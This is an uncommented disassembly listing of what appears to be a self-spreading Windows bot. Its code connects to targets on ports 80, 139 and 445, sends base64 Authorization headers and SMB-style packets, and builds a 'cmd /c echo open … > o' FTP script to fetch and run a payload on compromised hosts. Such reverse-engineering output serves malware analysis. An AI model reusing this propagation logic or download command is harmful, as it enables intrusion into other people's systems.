lea ecx, [ebp+var_28]
call sub_40D191
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_40D1E2
lea ecx, [ebp+var_28]
call sub_40D1F2
lea ecx, [ebp+var_38]
call sub_40D07A
lea ecx, [ebp+var_10]
call sub_40CFB3
lea ecx, [ebp+var_8]
call sub_40CFB3
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_40D1E2
lea ecx, [ebp+var_10]
call sub_40D093
lea ecx, [ebp+var_28]
call sub_40D07A
push offset byte_448E34
lea ecx, [ebp+var_8]
call sub_40D1C5
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40D1E2
lea ecx, [ebp+var_8]
call sub_40D093
lea ecx, [ebp+var_10]
call sub_40D07A
push offset word_448E36
lea ecx, [ebp+var_10]
call sub_40D1C5
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_40D1E2
lea ecx, [ebp+var_10]
call sub_40D093
lea ecx, [ebp+var_8]
call sub_40D07A
push offset dword_448E38
lea ecx, [ebp+var_8]
call sub_40D1C5
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40D1E2
lea ecx, [ebp+var_8]
call sub_40D093
lea ecx, [ebp+var_10]
call sub_40D07A
push (offset aA_1+2)
lea ecx, [ebp+var_48]
call sub_40D1C5
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_40D1E2
lea ecx, [ebp+var_8]
call sub_40D07A
pop esi
loc_40D591: ; CODE XREF: sub_40D24D+1B�j
; sub_40D24D+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop edi
pop ebx
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
leave
retn
sub_40D24D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D5A3 proc near ; CODE XREF: sub_40D667+A2�p
; sub_40D667+C7�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_8]
push edi
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
xor edi, edi
push eax
lea eax, [esi+1]
inc edi
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call ds:dword_4F5544 ; select
cmp eax, edi
jnz short loc_40D60A
lea eax, [ebp+var_10C]
push eax
push esi
call sub_43A942 ; __WSAFDIsSet
test eax, eax
jnz short loc_40D60E
loc_40D60A: ; CODE XREF: sub_40D5A3+54�j
xor eax, eax
jmp short loc_40D61E
; ---------------------------------------------------------------------------
loc_40D60E: ; CODE XREF: sub_40D5A3+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call ds:dword_4E2FE0 ; recv
loc_40D61E: ; CODE XREF: sub_40D5A3+69�j
pop edi
pop esi
leave
retn
sub_40D5A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D622 proc near ; CODE XREF: sub_40D667+80�p
; sub_40D667+AE�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call ds:dword_4E2FC4 ; htonl
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call ds:dword_4E3018 ; send
cmp eax, 4
jz short loc_40D64C
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40D64C: ; CODE XREF: sub_40D622+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E3018 ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_40D622 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D667 proc near ; CODE XREF: sub_40D746+48�p
; _0:0040DB74�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_41BE40
mov esi, eax
pop ecx
test esi, esi
jnz short loc_40D690
xor al, al
jmp loc_40D741
; ---------------------------------------------------------------------------
loc_40D690: ; CODE XREF: sub_40D667+20�j
push ebx
push 0
push esi
call sub_41E4B0
push 2Fh
push offset dword_448B48
push esi
call sub_41FBF0
push 8
lea eax, [esi+31h]
push offset dword_448B78
push eax
mov [esi+2Fh], di
call sub_41FBF0
push edi
lea ebx, [esi+3Bh]
push [ebp+arg_4]
mov [esi+39h], di
push ebx
call sub_41FBF0
push 6
add ebx, edi
push offset dword_4E5CD0
push ebx
call sub_41FBF0
push 85h
push offset dword_448AC0
push [ebp+arg_0]
call sub_40D622
add esp, 48h
test al, al
jnz short loc_40D6F7
loc_40D6F3: ; CODE XREF: sub_40D667+B8�j
xor bl, bl
jmp short loc_40D738
; ---------------------------------------------------------------------------
loc_40D6F7: ; CODE XREF: sub_40D667+8A�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push [ebp+arg_0]
call sub_40D5A3
push [ebp+var_4]
push esi
push [ebp+arg_0]
call sub_40D622
add esp, 1Ch
test al, al
jz short loc_40D6F3
push 0
lea eax, [ebp+var_104]
push edi
push eax
push [ebp+arg_0]
call sub_40D5A3
add esp, 10h
mov bl, 1
loc_40D738: ; CODE XREF: sub_40D667+8E�j
push esi
call sub_41C9D0
pop ecx
mov al, bl
loc_40D741: ; CODE XREF: sub_40D667+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_40D667 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D746 proc near ; CODE XREF: _0:0040DB5A�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_448B88
push [ebp+arg_0]
call ds:dword_4F5540 ; send
cmp eax, 48h
jnz short loc_40D781
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_40D5A3
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_40D781
cmp [ebp+var_20], 82h
jz short loc_40D785
loc_40D781: ; CODE XREF: sub_40D746+1B�j
; sub_40D746+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40D785: ; CODE XREF: sub_40D746+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D667
add esp, 0Ch
leave
retn
sub_40D746 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D798 proc near ; CODE XREF: sub_40D7E4+29�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
and dword ptr [ebp+var_8+4], 0
shl eax, 3
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
fmul ds:dbl_43C478
call sub_4201DC
and dword ptr [ebp+var_8+4], 0
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
push ecx
push ecx ; double
fst [ebp+var_8]
fmul ds:dbl_43C470
fstp [esp+10h+var_10]
call sub_41FFF0
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call sub_4201DC
inc eax
leave
retn
sub_40D798 endp
; =============== S U B R O U T I N E =======================================
sub_40D7E4 proc near ; CODE XREF: sub_40D95B+23�p
var_44 = qword ptr -44h
mov eax, offset loc_43B82F
call sub_420820
sub esp, 30h
push esi
lea eax, [ebp-0Dh]
push edi
xor esi, esi
push eax
lea ecx, [ebp-3Ch]
mov [ebp-24h], esi
call sub_40DBDC
push dword ptr [ebp+10h]
xor edi, edi
inc edi
mov [ebp-4], edi
call sub_40D798
pop ecx
push eax
lea ecx, [ebp-3Ch]
call sub_40DCE8
cmp [ebp+10h], esi
mov [ebp-1Ch], esi
jbe loc_40D92F
push ebx
mov ebx, [ebp+10h]
loc_40D82C: ; CODE XREF: sub_40D7E4+144�j
cmp dword ptr [ebp+10h], 3
jb short loc_40D837
push 3
loc_40D834: ; CODE XREF: sub_40D7E4+5B�j
pop ebx
jmp short loc_40D848
; ---------------------------------------------------------------------------
loc_40D837: ; CODE XREF: sub_40D7E4+4C�j
cmp dword ptr [ebp+10h], 2
jnz short loc_40D841
push 2
jmp short loc_40D834
; ---------------------------------------------------------------------------
loc_40D841: ; CODE XREF: sub_40D7E4+57�j
cmp [ebp+10h], edi
jnz short loc_40D848
mov ebx, edi
loc_40D848: ; CODE XREF: sub_40D7E4+51�j
; sub_40D7E4+60�j
and dword ptr [ebp-28h], 0
mov [ebp-2Ch], ebx
fild qword ptr [ebp-2Ch]
push ecx
push ecx ; double
fmul ds:dbl_43C480
fstp [esp+44h+var_44]
call sub_420210
pop ecx
pop ecx
call sub_4201DC
test ebx, ebx
mov [ebp-20h], eax
jbe short loc_40D889
mov esi, [ebp+0Ch]
mov ecx, ebx
mov edx, ecx
lea edi, [ebp-14h]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor edi, edi
inc edi
loc_40D889: ; CODE XREF: sub_40D7E4+8A�j
mov cl, [ebp-14h]
mov dl, [ebp-14h]
sar cl, 2
and cl, 3Fh
and dl, 3
mov [ebp-18h], cl
mov cl, [ebp-13h]
sar cl, 4
and cl, 0Fh
add [ebp+0Ch], ebx
shl dl, 4
add cl, dl
mov dl, [ebp-13h]
mov [ebp-17h], cl
mov cl, [ebp-12h]
sar cl, 6
and dl, 0Fh
sub [ebp+10h], ebx
and cl, 3
xor esi, esi
shl dl, 2
add cl, dl
mov [ebp-16h], cl
mov cl, [ebp-12h]
and cl, 3Fh
test eax, eax
mov [ebp-15h], cl
jbe short loc_40D8F6
add [ebp-1Ch], eax
loc_40D8DB: ; CODE XREF: sub_40D7E4+110�j
movsx eax, byte ptr [ebp+esi-18h]
lea ecx, [ebp-3Ch]
mov al, ds:byte_448BD8[eax]
push eax
push edi
call sub_40DC67
inc esi
cmp esi, [ebp-20h]
jb short loc_40D8DB
loc_40D8F6: ; CODE XREF: sub_40D7E4+F2�j
cmp dword ptr [ebp-1Ch], 48h
jb short loc_40D90B
push dword ptr [ebp+14h]
lea ecx, [ebp-3Ch]
call sub_40DC45
and dword ptr [ebp-1Ch], 0
loc_40D90B: ; CODE XREF: sub_40D7E4+116�j
push 4
pop esi
cmp [ebp-20h], esi
jnb short loc_40D924
sub esi, [ebp-20h]
loc_40D916: ; CODE XREF: sub_40D7E4+13E�j
push 3Dh
push edi
lea ecx, [ebp-3Ch]
call sub_40DC67
dec esi
jnz short loc_40D916
loc_40D924: ; CODE XREF: sub_40D7E4+12D�j
cmp dword ptr [ebp+10h], 0
ja loc_40D82C
pop ebx
loc_40D92F: ; CODE XREF: sub_40D7E4+3E�j
mov ecx, [ebp+8]
lea eax, [ebp-3Ch]
push eax
call sub_40DBF4
mov [ebp-24h], edi
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
call sub_40DC3D
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop edi
pop esi
mov large fs:0, ecx
leave
retn
sub_40D7E4 endp
; =============== S U B R O U T I N E =======================================
sub_40D95B proc near ; CODE XREF: _0:0040DB3D�p
mov eax, offset loc_43B849
call sub_420820
sub esp, 10h
push ebx
push esi
push edi
push offset word_4E5CDA
and dword ptr [ebp-4], 0
push dword ptr [ebp+10h]
lea eax, [ebp-1Ch]
push dword ptr [ebp+0Ch]
push eax
call sub_40D7E4
add esp, 10h
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 1
call sub_40DCE4
lea ecx, [ebp+14h]
mov esi, eax
call sub_40DCE4
lea esi, [esi+eax+36h]
push esi
call sub_41BE40
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40D9B1
xor bl, bl
jmp short loc_40D9F0
; ---------------------------------------------------------------------------
loc_40D9B1: ; CODE XREF: sub_40D95B+50�j
lea ecx, [ebp-1Ch]
call sub_40DCD7
push eax
lea ecx, [ebp+14h]
call sub_40DCD7
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi
push edi
call sub_41EC30
add esp, 14h
push 0
push esi
push edi
push dword ptr [ebp+8]
call ds:dword_4E3018 ; send
cmp eax, esi
jz short loc_40D9E7
xor bl, bl
jmp short loc_40D9E9
; ---------------------------------------------------------------------------
loc_40D9E7: ; CODE XREF: sub_40D95B+86�j
mov bl, 1
loc_40D9E9: ; CODE XREF: sub_40D95B+8A�j
push edi
call sub_41C9D0
pop ecx
loc_40D9F0: ; CODE XREF: sub_40D95B+54�j
and byte ptr [ebp-4], 0
lea ecx, [ebp-1Ch]
call sub_40DC3D
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+14h]
call sub_40DC3D
mov ecx, [ebp-0Ch]
pop edi
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_40D95B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 424h
and byte ptr [ebp-424h], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp-423h]
push 8Fh
rep stosd
stosw
stosb
lea eax, [ebp-424h]
push offset sub_448D88
push eax
call sub_41FBF0
add esp, 0Ch
mov eax, offset byte_43F0FC
push eax
push eax
movzx eax, word ptr ds:dword_4E2D00
push eax
push dword ptr [ebp+8]
call sub_40AEAD
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d > o&echo user 1 "...
lea eax, [ebp-395h]
push 400h
push eax
call sub_41EC30
add eax, 90h
push eax
lea eax, [ebp-424h]
push eax
push 164h
lea eax, [ebp-8]
push offset sub_448C20
push eax
call sub_40D24D
xor ebx, ebx
add esp, 30h
cmp [ebp-4], ebx
jnz short loc_40DAB7
xor eax, eax
jmp loc_40DBC1
; ---------------------------------------------------------------------------
loc_40DAB7: ; CODE XREF: _0:0040DAAE�j
mov [ebp-0Ch], ebx
loc_40DABA: ; CODE XREF: _0:0040DB9C�j
test ebx, ebx
jnz loc_40DBA2
push 6
push 1
push 2
call ds:dword_4F553C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_40DB8A
xor eax, eax
lea edi, [ebp-1Eh]
stosd
push dword ptr [ebp+0A8h]
stosd
stosd
stosw
mov word ptr [ebp-20h], 2
call ds:dword_4E2FC8 ; htons
mov [ebp-1Eh], ax
lea eax, [ebp+0Ch]
push eax
call ds:dword_4E3008 ; inet_addr
mov [ebp-1Ch], eax
lea eax, [ebp-20h]
push 10h
push eax
push esi
call ds:dword_4E2F70 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40DB7F
cmp dword ptr [ebp+0A8h], 50h
jnz short loc_40DB47
sub esp, 10h
lea eax, [ebp-0Dh]
mov ecx, esp
mov [ebp-24h], esp
push eax
lea eax, [ebp+0Ch]
push eax
call sub_40DC1A
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push esi
call sub_40D95B
add esp, 1Ch
jmp short loc_40DB7C
; ---------------------------------------------------------------------------
loc_40DB47: ; CODE XREF: _0:0040DB1F�j
cmp dword ptr [ebp+0A8h], 8Bh
jnz short loc_40DB61
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push esi
call sub_40D746
jmp short loc_40DB79
; ---------------------------------------------------------------------------
loc_40DB61: ; CODE XREF: _0:0040DB51�j
cmp dword ptr [ebp+0A8h], 1BDh
jnz short loc_40DB7F
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push esi
call sub_40D667
loc_40DB79: ; CODE XREF: _0:0040DB5F�j
add esp, 0Ch
loc_40DB7C: ; CODE XREF: _0:0040DB45�j
movzx ebx, al
loc_40DB7F: ; CODE XREF: _0:0040DB16�j _0:0040DB6B�j
push esi
call ds:dword_4E3060 ; closesocket
test ebx, ebx
jnz short loc_40DB95
loc_40DB8A: ; CODE XREF: _0:0040DAD3�j
push 3E8h
call ds:dword_4F534C ; Sleep
loc_40DB95: ; CODE XREF: _0:0040DB88�j
inc dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 2
jl loc_40DABA
loc_40DBA2: ; CODE XREF: _0:0040DABC�j
lea ecx, [ebp-8]
call sub_40D07A
test ebx, ebx
jz short loc_40DBBF
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_4481F8[eax]
inc dword ptr [eax]
loc_40DBBF: ; CODE XREF: _0:0040DBAC�j
mov eax, ebx
loc_40DBC1: ; CODE XREF: _0:0040DAB2�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40DBC6: ; DATA XREF: _2:0043F008�o
call sub_40E188
jmp $+5
push offset nullsub_1
call sub_420D10
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_40DBDC proc near ; CODE XREF: sub_40D7E4+1B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
push 0
mov al, [eax]
mov [esi], al
call sub_40DF46
mov eax, esi
pop esi
retn 4
sub_40DBDC endp
; =============== S U B R O U T I N E =======================================
sub_40DBF4 proc near ; CODE XREF: sub_40D7E4+152�p
; sub_43A4C0+3C�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
push 0
mov al, [edi]
mov [esi], al
call sub_40DF46
push 0FFFFFFFFh
push 0
push edi
mov ecx, esi
call sub_40DD57
mov eax, esi
pop edi
pop esi
retn 4
sub_40DBF4 endp
; =============== S U B R O U T I N E =======================================
sub_40DC1A proc near ; CODE XREF: _0:0040DB31�p
; sub_43A460+27�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, ecx
push 0
mov al, [eax]
mov [esi], al
call sub_40DF46
push [esp+4+arg_0]
mov ecx, esi
call sub_40DE4D
mov eax, esi
pop esi
retn 8
sub_40DC1A endp
; =============== S U B R O U T I N E =======================================
sub_40DC3D proc near ; CODE XREF: sub_40D7E4+161�p
; sub_40D95B+9C�p ...
push 1
call sub_40DF46
retn
sub_40DC3D endp
; =============== S U B R O U T I N E =======================================
sub_40DC45 proc near ; CODE XREF: sub_40D7E4+11E�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_40DC62
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_40DCFC
pop esi
retn 4
sub_40DC45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40DC62 proc near ; CODE XREF: sub_40DC45+7�p
; sub_40DE4D+7�p
jmp sub_41BC70
sub_40DC62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DC67 proc near ; CODE XREF: sub_40D7E4+107�p
; sub_40D7E4+138�p
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, ecx
or eax, 0FFFFFFFFh
push edi
sub eax, [esi+8]
cmp eax, [ebp+arg_0]
ja short loc_40DC7E
call sub_43A460
loc_40DC7E: ; CODE XREF: sub_40DC67+10�j
cmp [ebp+arg_0], 0
jbe short loc_40DCB6
mov edi, [esi+8]
push 0
add edi, [ebp+arg_0]
mov ecx, esi
push edi
call sub_40DE9A
test al, al
jz short loc_40DCB6
lea eax, [ebp+arg_4]
push eax
mov eax, [esi+4]
push [ebp+arg_0]
add eax, [esi+8]
push eax
call sub_40DCBE
add esp, 0Ch
mov ecx, esi
push edi
call sub_40DE6A
loc_40DCB6: ; CODE XREF: sub_40DC67+1B�j
; sub_40DC67+2F�j
mov eax, esi
pop edi
pop esi
pop ebp
retn 8
sub_40DC67 endp
; =============== S U B R O U T I N E =======================================
sub_40DCBE proc near ; CODE XREF: sub_40DC67+3F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
push [esp+arg_4]
movsx eax, byte ptr [eax]
push eax
push [esp+8+arg_0]
call sub_41E4B0
add esp, 0Ch
retn
sub_40DCBE endp
; =============== S U B R O U T I N E =======================================
sub_40DCD7 proc near ; CODE XREF: sub_40D95B+59�p
; sub_40D95B+62�p ...
; FUNCTION CHUNK AT 0040DF40 SIZE 00000006 BYTES
mov eax, [ecx+4]
test eax, eax
jnz short locret_40DCE3
jmp loc_40DF40
; ---------------------------------------------------------------------------
locret_40DCE3: ; CODE XREF: sub_40DCD7+5�j
retn
sub_40DCD7 endp
; =============== S U B R O U T I N E =======================================
sub_40DCE4 proc near ; CODE XREF: sub_40D95B+32�p
; sub_40D95B+3C�p
mov eax, [ecx+8]
retn
sub_40DCE4 endp
; =============== S U B R O U T I N E =======================================
sub_40DCE8 proc near ; CODE XREF: sub_40D7E4+33�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp [ecx+0Ch], eax
jnb short locret_40DCF9
push 0
push eax
call sub_40DE9A
locret_40DCF9: ; CODE XREF: sub_40DCE8+7�j
retn 4
sub_40DCE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DCFC proc near ; CODE XREF: sub_40DC45+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, ecx
or eax, 0FFFFFFFFh
push edi
sub eax, [esi+8]
cmp eax, [ebp+arg_4]
ja short loc_40DD13
call sub_43A460
loc_40DD13: ; CODE XREF: sub_40DCFC+10�j
cmp [ebp+arg_4], 0
jbe short loc_40DD4A
mov edi, [esi+8]
push 0
add edi, [ebp+arg_4]
mov ecx, esi
push edi
call sub_40DE9A
test al, al
jz short loc_40DD4A
push [ebp+arg_4]
mov eax, [esi+4]
add eax, [esi+8]
push [ebp+arg_0]
push eax
call sub_40DD52
add esp, 0Ch
mov ecx, esi
push edi
call sub_40DE6A
loc_40DD4A: ; CODE XREF: sub_40DCFC+1B�j
; sub_40DCFC+2F�j
mov eax, esi
pop edi
pop esi
pop ebp
retn 8
sub_40DCFC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40DD52 proc near ; CODE XREF: sub_40DCFC+3E�p
; sub_40DD57+D9�p ...
jmp sub_41FBF0
sub_40DD52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DD57 proc near ; CODE XREF: sub_40DBF4+1A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, ecx
mov ecx, [ebp+arg_0]
push edi
call sub_40DE49
mov ebx, [ebp+arg_4]
cmp eax, ebx
jnb short loc_40DD73
call sub_43A760
loc_40DD73: ; CODE XREF: sub_40DD57+15�j
mov ecx, [ebp+arg_0]
call sub_40DE49
mov edi, eax
sub edi, ebx
cmp [ebp+arg_8], edi
jnb short loc_40DD87
mov edi, [ebp+arg_8]
loc_40DD87: ; CODE XREF: sub_40DD57+2B�j
mov ecx, [ebp+arg_0]
cmp esi, ecx
jnz short loc_40DDA9
add edi, ebx
push 0FFFFFFFFh
push edi
mov ecx, esi
call sub_40DFD6
push ebx
push 0
mov ecx, esi
call sub_40DFD6
jmp loc_40DE40
; ---------------------------------------------------------------------------
loc_40DDA9: ; CODE XREF: sub_40DD57+35�j
test edi, edi
jbe short loc_40DE12
call sub_40DE49
cmp edi, eax
jnz short loc_40DE12
mov ecx, [ebp+arg_0]
call sub_40DCD7
push eax
mov ecx, esi
call sub_40E11B
cmp byte ptr [eax], 0FEh
jnb short loc_40DE12
push [ebp+arg_0]
push esi
call sub_40E173
pop ecx
test al, al
pop ecx
jz short loc_40DE12
push 1
mov ecx, esi
call sub_40DF46
mov ecx, [ebp+arg_0]
call sub_40DCD7
mov ecx, [ebp+arg_0]
mov [esi+4], eax
call sub_40DE49
mov ecx, [ebp+arg_0]
mov [esi+8], eax
call sub_40E052
push dword ptr [esi+4]
mov ecx, esi
mov [esi+0Ch], eax
call sub_40E11B
inc byte ptr [eax]
jmp short loc_40DE40
; ---------------------------------------------------------------------------
loc_40DE12: ; CODE XREF: sub_40DD57+54�j
; sub_40DD57+5D�j ...
push 1
push edi
mov ecx, esi
call sub_40DE9A
test al, al
jz short loc_40DE40
mov ecx, [ebp+arg_0]
push edi
call sub_40DCD7
add eax, [ebp+arg_4]
push eax
push dword ptr [esi+4]
call sub_40DD52
add esp, 0Ch
mov ecx, esi
push edi
call sub_40DE6A
loc_40DE40: ; CODE XREF: sub_40DD57+4D�j
; sub_40DD57+B9�j ...
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_40DD57 endp
; =============== S U B R O U T I N E =======================================
sub_40DE49 proc near ; CODE XREF: sub_40DD57+B�p
; sub_40DD57+1F�p ...
mov eax, [ecx+8]
retn
sub_40DE49 endp
; =============== S U B R O U T I N E =======================================
sub_40DE4D proc near ; CODE XREF: sub_40DC1A+18�p
; sub_40E130+27�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_40DC62
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_40DFA0
pop esi
retn 4
sub_40DE4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DE6A proc near ; CODE XREF: sub_40DC67+4A�p
; sub_40DCFC+49�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
and [ebp+var_1], 0
mov [ecx+8], eax
mov ecx, [ecx+4]
lea edx, [ebp+var_1]
add ecx, eax
push edx
push ecx
call sub_40DE8D
pop ecx
pop ecx
leave
retn 4
sub_40DE6A endp
; =============== S U B R O U T I N E =======================================
sub_40DE8D proc near ; CODE XREF: sub_40DE6A+18�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
mov al, [eax]
mov [ecx], al
retn
sub_40DE8D endp
; =============== S U B R O U T I N E =======================================
sub_40DE9A proc near ; CODE XREF: sub_40DC67+28�p
; sub_40DCE8+C�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push ebx
push esi
push edi
mov esi, ecx
call sub_40E040
mov edi, [esp+0Ch+arg_0]
cmp eax, edi
jnb short loc_40DEB1
call sub_43A460
loc_40DEB1: ; CODE XREF: sub_40DE9A+10�j
mov eax, [esi+4]
xor ebx, ebx
cmp eax, ebx
jz short loc_40DEF1
push eax
mov ecx, esi
call sub_40E11B
cmp [eax], bl
jz short loc_40DEF1
push dword ptr [esi+4]
mov ecx, esi
call sub_40E11B
cmp byte ptr [eax], 0FFh
jz short loc_40DEF1
cmp edi, ebx
mov ecx, esi
jnz short loc_40DF32
push dword ptr [esi+4]
call sub_40E11B
dec byte ptr [eax]
push ebx
loc_40DEE6: ; CODE XREF: sub_40DE9A+63�j
mov ecx, esi
call sub_40DF46
loc_40DEED: ; CODE XREF: sub_40DE9A+68�j
; sub_40DE9A+72�j
xor al, al
jmp short loc_40DF3A
; ---------------------------------------------------------------------------
loc_40DEF1: ; CODE XREF: sub_40DE9A+1E�j
; sub_40DE9A+2A�j ...
cmp edi, ebx
jnz short loc_40DF0E
cmp [esp+0Ch+arg_4], bl
jz short loc_40DEFF
push 1
jmp short loc_40DEE6
; ---------------------------------------------------------------------------
loc_40DEFF: ; CODE XREF: sub_40DE9A+5F�j
cmp [esi+4], ebx
jz short loc_40DEED
push ebx
mov ecx, esi
call sub_40DE6A
jmp short loc_40DEED
; ---------------------------------------------------------------------------
loc_40DF0E: ; CODE XREF: sub_40DE9A+59�j
cmp [esp+0Ch+arg_4], bl
jz short loc_40DF2B
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_40DF20
cmp eax, edi
jnb short loc_40DF38
loc_40DF20: ; CODE XREF: sub_40DE9A+80�j
push 1
mov ecx, esi
call sub_40DF46
jmp short loc_40DF30
; ---------------------------------------------------------------------------
loc_40DF2B: ; CODE XREF: sub_40DE9A+78�j
cmp [esi+0Ch], edi
jnb short loc_40DF38
loc_40DF30: ; CODE XREF: sub_40DE9A+8F�j
mov ecx, esi
loc_40DF32: ; CODE XREF: sub_40DE9A+3F�j
push edi
call sub_40E056
loc_40DF38: ; CODE XREF: sub_40DE9A+84�j
; sub_40DE9A+94�j
mov al, 1
loc_40DF3A: ; CODE XREF: sub_40DE9A+55�j
pop edi
pop esi
pop ebx
retn 8
sub_40DE9A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40DCD7
loc_40DF40: ; CODE XREF: sub_40DCD7+7�j
mov eax, offset dword_43C488
retn
; END OF FUNCTION CHUNK FOR sub_40DCD7
; =============== S U B R O U T I N E =======================================
sub_40DF46 proc near ; CODE XREF: sub_40DBDC+D�p
; sub_40DBF4+E�p ...
arg_0 = byte ptr 4
push ebx
xor ebx, ebx
cmp [esp+4+arg_0], bl
push esi
mov esi, ecx
jz short loc_40DF92
mov eax, [esi+4]
cmp eax, ebx
jz short loc_40DF92
push eax
call sub_40E11B
cmp [eax], bl
jz short loc_40DF80
push dword ptr [esi+4]
mov ecx, esi
call sub_40E11B
